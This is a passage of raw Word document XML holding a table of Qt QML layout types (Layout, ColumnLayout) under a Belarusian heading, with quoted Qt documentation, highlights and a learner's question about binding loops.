      <w:bookmarkStart w:id="1408" w:name="_Toc483000832"/>
      <w:bookmarkStart w:id="1409" w:name="_Toc483003825"/>
      <w:bookmarkStart w:id="1410" w:name="_Toc483604178"/>
      <w:bookmarkStart w:id="1411" w:name="_Toc483605398"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>тыпы модуля</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1408"/>
      <w:bookmarkEnd w:id="1409"/>
      <w:bookmarkEnd w:id="1410"/>
      <w:bookmarkEnd w:id="1411"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11483"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2235"/>
        <w:gridCol w:w="7546"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Тып</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>апісанне</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Layout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1725" w:history="1">
              <w:r w:rsidR="00A40BC4" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00A40BC4" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detailed Description</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">An object of type Layout </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is attached to children of the layout</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>provide layout specific information about the item</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The properties of the attached object influence </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>how the layout will arrange the items</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For instance, you can specify </w:t>
            </w:r>
            <w:hyperlink r:id="rId1726" w:anchor="minimumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>minimumWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId1727" w:anchor="preferredWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>preferredWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, and </w:t>
            </w:r>
            <w:hyperlink r:id="rId1728" w:anchor="maximumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>maximumWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> if the default values are not satisfactory.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>When a layout is resized, items may grow or shrink. Due to this, items have a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1729" w:anchor="minimumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>minimum size</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId1730" w:anchor="preferredWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>preferred size</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> and a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1731" w:anchor="maximumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>maximum size</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If minimum size has not been explicitly specified on an item, the size is set to </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. If maximum size has not been explicitly specified on an item, the size is set to </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number.POSITIVE_INFINITY</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">For layouts, the </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>implicit minimum and maximum sizes depend on the content of the layouts</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The </w:t>
            </w:r>
            <w:hyperlink r:id="rId1732" w:anchor="fillWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>fillWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> and </w:t>
            </w:r>
            <w:hyperlink r:id="rId1733" w:anchor="fillHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>fillHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> properties can either be true or false. If they are false, the item's size will be fixed to its preferred size. Otherwise, it will grow or shrink between its minimum and maximum size as the layout is resized.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>It is not recommended</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to have bindings to the x, y, width, or height properties of items in a layout, since this would conflict with the goals of Layout, and can also cause </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>binding loops</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>How? What is it?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="002230B8" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ColumnLayout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1734" w:history="1">
              <w:r w:rsidR="00A40BC4" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-layouts-columnlayout.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00A40BC4" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detailed Description</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">It is available as a </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
